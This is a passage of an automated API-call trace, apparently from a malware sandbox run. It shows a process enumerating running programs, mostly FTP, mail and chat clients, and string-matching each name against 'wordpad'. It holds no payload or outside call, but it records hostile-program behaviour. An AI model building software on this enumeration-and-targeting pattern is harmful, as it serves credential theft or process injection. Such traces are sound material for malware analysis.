th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0100.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.671] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356c3b0 [0100.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356c3b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0100.671] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0100.671] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="wordpad") returned 0x0 [0100.671] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0100.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.672] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e1d8 [0100.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x356e1d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.672] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0100.672] StrStrIA (lpFirst="3dftp.exe", lpSrch="wordpad") returned 0x0 [0100.672] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0100.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.673] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d828 [0100.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357d828, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0100.673] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0100.673] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="wordpad") returned 0x0 [0100.673] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0100.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.674] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e2e0 [0100.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x356e2e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.674] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0100.674] StrStrIA (lpFirst="alftp.exe", lpSrch="wordpad") returned 0x0 [0100.674] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0100.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.678] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e1f0 [0100.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x356e1f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0100.678] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0100.678] StrStrIA (lpFirst="barca.exe", lpSrch="wordpad") returned 0x0 [0100.678] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0100.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.682] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e190 [0100.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x356e190, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0100.682] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0100.682] StrStrIA (lpFirst="bitkinex.exe", lpSrch="wordpad") returned 0x0 [0100.682] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0100.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.685] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e238 [0100.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x356e238, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0100.685] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0100.685] StrStrIA (lpFirst="coreftp.exe", lpSrch="wordpad") returned 0x0 [0100.685] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0100.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.687] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e1d8 [0100.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e1d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0100.687] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0100.687] StrStrIA (lpFirst="far.exe", lpSrch="wordpad") returned 0x0 [0100.687] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0100.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.689] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356e358 [0100.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x356e358, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0100.689] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0100.689] StrStrIA (lpFirst="filezilla.exe", lpSrch="wordpad") returned 0x0 [0100.689] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0100.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.691] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e0d0 [0100.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x356e0d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.691] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0100.691] StrStrIA (lpFirst="flashfxp.exe", lpSrch="wordpad") returned 0x0 [0100.691] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0100.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.693] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e148 [0100.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x356e148, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0100.693] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0100.694] StrStrIA (lpFirst="fling.exe", lpSrch="wordpad") returned 0x0 [0100.694] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0100.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.696] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d7a8 [0100.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357d7a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0100.696] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0100.696] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="wordpad") returned 0x0 [0100.696] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0100.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.697] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d648 [0100.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357d648, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0100.697] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0100.700] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="wordpad") returned 0x0 [0100.700] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0100.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.701] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e1c8 [0100.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e1c8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0100.701] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0100.701] StrStrIA (lpFirst="icq.exe", lpSrch="wordpad") returned 0x0 [0100.701] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0100.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.704] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e2b0 [0100.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x356e2b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.704] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0100.704] StrStrIA (lpFirst="leechftp.exe", lpSrch="wordpad") returned 0x0 [0100.704] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0100.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.706] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e0a0 [0100.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x356e0a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.707] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0100.707] StrStrIA (lpFirst="ncftp.exe", lpSrch="wordpad") returned 0x0 [0100.707] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0100.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.718] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e250 [0100.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x356e250, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0100.718] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0100.718] StrStrIA (lpFirst="notepad.exe", lpSrch="wordpad") returned 0x0 [0100.718] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0100.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.719] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356e118 [0100.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x356e118, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0100.719] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0100.719] StrStrIA (lpFirst="operamail.exe", lpSrch="wordpad") returned 0x0 [0100.719] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0100.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.721] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e268 [0100.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x356e268, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0100.721] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0100.721] StrStrIA (lpFirst="pidgin.exe", lpSrch="wordpad") returned 0x0 [0100.721] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0100.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.722] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356e130 [0100.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x356e130, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0100.722] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0100.722] StrStrIA (lpFirst="scriptftp.exe", lpSrch="wordpad") returned 0x0 [0100.722] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0100.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.723] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e370 [0100.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x356e370, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0100.723] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0100.724] StrStrIA (lpFirst="skype.exe", lpSrch="wordpad") returned 0x0 [0100.724] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0100.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.725] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e280 [0100.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x356e280, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.725] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0100.725] StrStrIA (lpFirst="smartftp.exe", lpSrch="wordpad") returned 0x0 [0100.725] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0100.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.726] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e2f8 [0100.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x356e2f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0100.726] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0100.726] StrStrIA (lpFirst="totalcmd.exe", lpSrch="wordpad") returned 0x0 [0100.726] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, 